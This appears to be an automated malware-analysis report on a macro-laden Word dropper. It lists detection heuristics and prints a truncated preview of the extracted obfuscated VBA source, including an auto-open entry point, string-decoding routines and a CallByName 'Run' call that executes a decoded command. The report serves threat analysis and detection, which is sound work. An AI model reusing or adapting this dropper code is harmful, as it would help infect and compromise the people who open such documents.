Malware Insights
The sample is a malicious Office document containing VBA macros. The 'AutOOpen' macro is triggered upon opening, and it uses 'CreateObject' and 'CallByName' to execute code. The document body explicitly instructs the user to 'Enable editing' and 'Enable content', indicating a lure to bypass security. The VBA script appears to be obfuscated but contains calls that likely lead to downloading and executing a second-stage payload, potentially via PowerShell, and establishing persistence through a Run key. The ClamAV detection 'Doc.Dropper.Agent-6564663-0' further supports its role as a dropper.
Heuristics 9
-
ClamAV: Doc.Dropper.Agent-6564663-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6564663-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8633 bytes |
SHA-256: e911048736175917cca1fac494f56351469833f43254e83b04d9cb2242178f21 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
theeyamt
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
End Sub
Attribute VB_Name = "aota0616"
Function plathovc(avehsiahc, October1821)
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
plathovc = moneyalpha(nosnebib.giannnisss) + avehsiahc + moneyalpha(VEHCIRTAP.grimmasa) + _
October1821 + moneyalpha(nosnebib.ruptmanc + nosnebib.voin2007) + October1821
End Function
Function hotfriday()
hotfriday = vogonehcloK.chinesebao
End Function
Function rufexwob()
rufexwob = "lgcua/gEmaQRa[o[ilE.]/"
End Function
Sub civeshoc(Drake269)
honeywarez = "Run"
gantcirc = 0
glennboots = True
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
CallByName Drake269, honeywarez, VbMethod, nosnebib.besstirp, gantcirc, glennboots
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
End Sub
Function calperf1()
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
calperf1 = surfabc1232.saptrotb
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
End Function
Function straggling(unixbill)
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
straggling = moneyalpha(rufexwob + surfabc1232.bondgone) + unixbill + _
moneyalpha(surfabc1232.icqelvis) + unixbill + moneyalpha(vogonehcloK.cpvo2391)
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
End Function
Function lumeyres()
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
If 1 = 2 Then
MsgBox "Hello"
End If
lumeyres = nosnebib.dreamcat
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
End Function
Function lakers4321(onomonom, gyppi105, AVONIHCTEV, tigresnake)
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
If 1 = 2 Then
MsgBox "Hello"
End If
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
nosnebib.besstirp = plathovc(onomonom, gyppi105) + igaymiirP(onomonom, AVONIHCTEV) + straggling(tigresnake)
End Function
Attribute VB_Name = "clysmgog"
Function jiadouu1()
jiadouu1 = vogonehcloK.runisala
End Function
Function tempenny(adamflash As String, nilanereP As Integer) As String
Dim golfhector As Integer
golfhector = 0
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
For maurice301 = 1 To 90
If (HIKSVONIGOL(jiadouu1, maurice301) = adamflash) Then
golfhector = maurice301
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
Exit For
End If
Next maurice301
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
golfhector = IIf(golfhector - nilanereP <= 0, 90 + golfhector - nilanereP, golfhector - nilanereP)
tempenny = HIKSVONIGOL(jiadouu1, golfhector)
End Function
Attribute VB_Name = "menonaes"
Function igaymiirP(safendbl, johnsnuffy)
avealahcaB = 84 - 28
avealahcaB = 75 + 30 * 1
igaymiirP = moneyalpha(VEHCIRTAP.voknespak) + johnsnuffy + moneyalpha(VEHCIRTAP.antoGolos4) + _
johnsnuffy + moneyalpha(VEHCIRTAP.arktaherok) + safendbl + _
moneyalpha(surfabc1232.ozofameh + dealtrid + surfabc1232.crookque) + safendbl + moneyalpha(surfabc1232.ozofameh)
avealahcaB = 84 - 28
avealahcaB = avealahcaB - 31 + 34 + 3
End Function
Function dealtrid()
dealtrid = "Q]h]a/sh]macal]mgEmaQRa[o[ilE.]/"
End Function
Function indianlo()
indianlo = deskjet7
End Function
Function deskjet7()
deskjet7 = moneyalpha(surfabc1232.daiserau)
End Function
Function FEBRUARY1786()
FEBRUARY1786 = nosnebib.wethbate
End Function
Attribute VB_Name = "nosnebib"
Attribute VB_Base = "0{3C42E643-BB3D-42D5-8EA4-1FE88B3FFDDE}{924002AB-064C-469B-BF5F-EBD201444C73}"
Attribute VB_GlobalNameSpace = False
Attribute V
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.